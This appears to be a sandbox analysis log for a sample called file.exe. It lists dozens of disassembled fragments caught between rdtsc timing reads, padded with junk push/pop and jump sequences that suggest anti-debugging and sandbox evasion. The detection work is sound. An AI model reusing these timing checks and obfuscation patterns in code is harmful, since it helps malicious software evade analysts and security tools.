Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7232 second address: 7D72A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D1B7Fh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F07811116D8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D29F4h] 0x00000033 movsx edi, bx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F07811116D8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push ebx 0x00000057 pop ebx 0x00000058 jmp 00007F07811116DEh 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D6FEF second address: 7D6FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784C15 second address: 784C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784C1B second address: 784C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 je 00007F0780D1BDB6h 0x0000000c pop ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784C2B second address: 784C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBF58 second address: 7DBF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0780D1BDB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBF62 second address: 7DBF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DD527 second address: 7DD531 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0780D1BDBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DD7C3 second address: 7DD7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF746 second address: 7DF74D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0854 second address: 7E085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF74D second address: 7DF769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0780D1BDC0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1668 second address: 7E166C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF769 second address: 7DF76F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF76F second address: 7DF7F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F07811116D8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a or bx, 8505h 0x0000002f mov edi, ecx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F07811116D8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 and edi, dword ptr [ebp+122D181Ch] 0x00000058 mov bx, C413h 0x0000005c mov eax, dword ptr [ebp+122D10EDh] 0x00000062 jng 00007F07811116DAh 0x00000068 mov bx, 9DE9h 0x0000006c push FFFFFFFFh 0x0000006e and edi, dword ptr [ebp+122D38D4h] 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1831 second address: 7E1835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1835 second address: 7E1839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4D6A second address: 7E4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1839 second address: 7E183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4F2F second address: 7E4F45 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F0780D1BDB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4F45 second address: 7E4FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx edi, bx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr [ebp+122D3502h], ebx 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 jl 00007F07811116DAh 0x00000027 mov di, 68D1h 0x0000002b mov eax, dword ptr [ebp+122D0BA1h] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F07811116D8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b and bx, FCD8h 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F07811116D8h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c mov dword ptr [ebp+122D27EDh], eax 0x00000072 nop 0x00000073 jmp 00007F07811116E1h 0x00000078 push eax 0x00000079 push edi 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4FDE second address: 7E4FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3EEA second address: 7E3F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F07811116E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F07811116D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6DCE second address: 7E6DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6DD2 second address: 7E6DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7E66 second address: 7E7E74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7E74 second address: 7E7E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7E78 second address: 7E7E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7E99 second address: 7E7E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7E9D second address: 7E7EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9F4D second address: 7E9F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9F52 second address: 7E9F64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F0780D1BDB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9F64 second address: 7E9F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBF73 second address: 7EBF77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7FAF second address: 7E7FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E8098 second address: 7E80AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0780D1BDBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC1F8 second address: 7EC1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F02B6 second address: 7F02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0780D1BDC1h 0x00000007 jmp 00007F0780D1BDBEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5EEC second address: 7F5EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5EF2 second address: 7F5F02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0780D1BDB6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5F02 second address: 7F5F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6050 second address: 7F6057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6057 second address: 7F605C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F605C second address: 7F6062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F6062 second address: 7F609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F07811116DAh 0x00000011 jnl 00007F07811116D6h 0x00000017 popad 0x00000018 jns 00007F07811116F0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F609F second address: 7F60AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F61F3 second address: 7F621C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07811116DDh 0x00000008 js 00007F07811116D6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F07811116E0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796F76 second address: 796F8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0780D1BDBEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796F8A second address: 796FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F07811116E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCA79 second address: 7FCA83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0780D1BDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCA83 second address: 7FCA88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCBC0 second address: 7FCBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCBCB second address: 621C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 4400380Ch 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F07811116D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push dword ptr [ebp+122D1645h] 0x0000002d jnc 00007F07811116E4h 0x00000033 jne 00007F07811116DCh 0x00000039 call dword ptr [ebp+122D33E8h] 0x0000003f pushad 0x00000040 xor dword ptr [ebp+122D37BFh], edi 0x00000046 xor eax, eax 0x00000048 jmp 00007F07811116DBh 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 jc 00007F07811116DCh 0x00000057 mov dword ptr [ebp+122D27C5h], eax 0x0000005d mov dword ptr [ebp+122D389Ch], eax 0x00000063 cmc 0x00000064 mov esi, 0000003Ch 0x00000069 mov dword ptr [ebp+122D27C5h], edi 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 cmc 0x00000074 lodsw 0x00000076 jnl 00007F07811116E4h 0x0000007c mov dword ptr [ebp+122D37BFh], edx 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 mov dword ptr [ebp+122D2BF5h], eax 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 sub dword ptr [ebp+122D2B08h], esi 0x00000096 nop 0x00000097 push eax 0x00000098 push eax 0x00000099 push edx 0x0000009a ja 00007F07811116D6h 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801A41 second address: 801A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDBEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jns 00007F0780D1BDB6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F0780D1BDC2h 0x0000001c popad 0x0000001d jns 00007F0780D1BDC6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801A8A second address: 801AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801AA1 second address: 801ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80073A second address: 800764 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F07811116EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F07811116D6h 0x00000010 ja 00007F07811116D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800764 second address: 80078B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0780D1BDBFh 0x0000000f jnc 00007F0780D1BDBEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800EA0 second address: 800EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800EAB second address: 800EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800EAF second address: 800EE9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F07811116D6h 0x00000008 jnc 00007F07811116D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F07811116DEh 0x00000017 pushad 0x00000018 jmp 00007F07811116E7h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800EE9 second address: 800F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0780D1BDC3h 0x00000009 popad 0x0000000a jmp 00007F0780D1BDBFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801072 second address: 80107E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07811116DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8011C3 second address: 8011C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8011C8 second address: 8011CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8011CD second address: 8011E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F0780D1BDBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8014E4 second address: 8014EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80175A second address: 80175E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80175E second address: 801766 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80503C second address: 805063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0780D1BDC8h 0x0000000e jl 00007F0780D1BDB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789BB1 second address: 789BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789BB5 second address: 789BBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 808F2B second address: 808F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F07811116D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 808F45 second address: 808F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 808F4D second address: 808F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809089 second address: 8090B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F0780D1BDB6h 0x00000009 jbe 00007F0780D1BDB6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007F0780D1BDC5h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809348 second address: 809397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07811116E0h 0x00000009 jmp 00007F07811116E3h 0x0000000e popad 0x0000000f pushad 0x00000010 jne 00007F07811116D6h 0x00000016 jnl 00007F07811116D6h 0x0000001c jmp 00007F07811116E9h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80982F second address: 809833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809DA6 second address: 809DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809DAB second address: 809DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809DB1 second address: 809DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F07811116E1h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F07811116E2h 0x00000017 push esi 0x00000018 jl 00007F07811116D6h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809DF2 second address: 809E13 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0780D1BDB8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0780D1BDC4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80A345 second address: 80A38D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07811116E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F07811116E2h 0x0000000e pushad 0x0000000f jmp 00007F07811116E9h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EA88 second address: 80EAA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0780D1BDBFh 0x00000008 pop ecx 0x00000009 jo 00007F0780D1BDC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80D920 second address: 80D924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80D924 second address: 80D955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b jmp 00007F0780D1BDBDh 0x00000010 jmp 00007F0780D1BDC5h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
